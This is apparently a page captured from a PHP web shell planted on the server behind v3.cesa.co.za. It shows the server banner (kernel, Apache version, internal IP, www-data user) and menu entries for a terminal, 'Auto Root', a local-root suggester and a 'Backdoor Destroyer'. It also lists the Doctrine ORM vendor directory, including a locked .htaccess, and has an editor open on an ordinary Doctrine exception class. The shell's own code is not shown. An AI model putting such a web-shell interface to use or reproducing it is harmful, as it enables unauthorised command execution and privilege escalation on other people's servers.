Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
doctrine /
orm /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Cache
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Decorator
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Event
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Exception
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Id
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Internal
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Mapping
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Persisters
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Proxy
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Query
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Repository
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Tools
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Utility
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
AbstractQuery.php
40.83
KB
-rwxrwxr-x
2026-04-02 06:18
Cache.php
4.71
KB
-rwxrwxr-x
2026-04-02 06:18
Configuration.php
35.73
KB
-rwxrwxr-x
2026-04-02 06:18
EntityManager.php
31.96
KB
-rwxrwxr-x
2026-04-02 06:18
EntityManagerInterface.php
9.59
KB
-rwxrwxr-x
2026-04-02 06:18
EntityNotFoundException.php
1.06
KB
-rwxrwxr-x
2026-04-02 06:18
EntityRepository.php
10.99
KB
-rwxrwxr-x
2026-04-02 06:18
Events.php
3.93
KB
-rwxrwxr-x
2026-04-02 06:18
LazyCriteriaCollection.php
2.88
KB
-rwxrwxr-x
2026-04-02 06:18
NativeQuery.php
1.76
KB
-rwxrwxr-x
2026-04-02 06:18
NoResultException.php
356
B
-rwxrwxr-x
2026-04-02 06:18
NonUniqueResultException.php
468
B
-rwxrwxr-x
2026-04-02 06:18
ORMException.php
8.82
KB
-rwxrwxr-x
2026-04-02 06:18
ORMInvalidArgumentException.php
10.34
KB
-rwxrwxr-x
2026-04-02 06:18
ORMSetup.php
6.88
KB
-rwxrwxr-x
2026-04-02 06:18
OptimisticLockException.php
2.03
KB
-rwxrwxr-x
2026-04-02 06:18
PersistentCollection.php
21.18
KB
-rwxrwxr-x
2026-04-02 06:18
PessimisticLockException.php
309
B
-rwxrwxr-x
2026-04-02 06:18
Query.php
24.43
KB
-rwxrwxr-x
2026-04-02 06:18
QueryBuilder.php
44.52
KB
-rwxrwxr-x
2026-04-02 06:18
TransactionRequiredException.php
496
B
-rwxrwxr-x
2026-04-02 06:18
UnexpectedResultException.php
209
B
-rwxrwxr-x
2026-04-02 06:18
UnitOfWork.php
145.19
KB
-rwxrwxr-x
2026-04-02 06:18
Version.php
962
B
-rwxrwxr-x
2026-04-02 06:18
Save
Rename
<?php declare(strict_types=1); namespace Doctrine\ORM; use DateTimeInterface; use Doctrine\ORM\Exception\ORMException; /** * An OptimisticLockException is thrown when a version check on an object * that uses optimistic locking through a version field fails. */ class OptimisticLockException extends ORMException { /** @var object|string|null */ private $entity; /** * @param string $msg * @param object|string|null $entity */ public function __construct($msg, $entity) { parent::__construct($msg); $this->entity = $entity; } /** * Gets the entity that caused the exception. * * @return object|string|null */ public function getEntity() { return $this->entity; } /** * @param object|class-string $entity * * @return OptimisticLockException */ public static function lockFailed($entity) { return new self('The optimistic lock on an entity failed.', $entity); } /** * @param object $entity * @param int|string|DateTimeInterface $expectedLockVersion * @param int|string|DateTimeInterface $actualLockVersion * * @return OptimisticLockException */ public static function lockFailedVersionMismatch($entity, $expectedLockVersion, $actualLockVersion) { $expectedLockVersion = $expectedLockVersion instanceof DateTimeInterface ? $expectedLockVersion->getTimestamp() : $expectedLockVersion; $actualLockVersion = $actualLockVersion instanceof DateTimeInterface ? $actualLockVersion->getTimestamp() : $actualLockVersion; return new self('The optimistic lock failed, version ' . $expectedLockVersion . ' was expected, but is actually ' . $actualLockVersion, $entity); } /** * @param string $entityName * * @return OptimisticLockException */ public static function notVersioned($entityName) { return new self('Cannot obtain optimistic lock on unversioned entity ' . $entityName, null); } }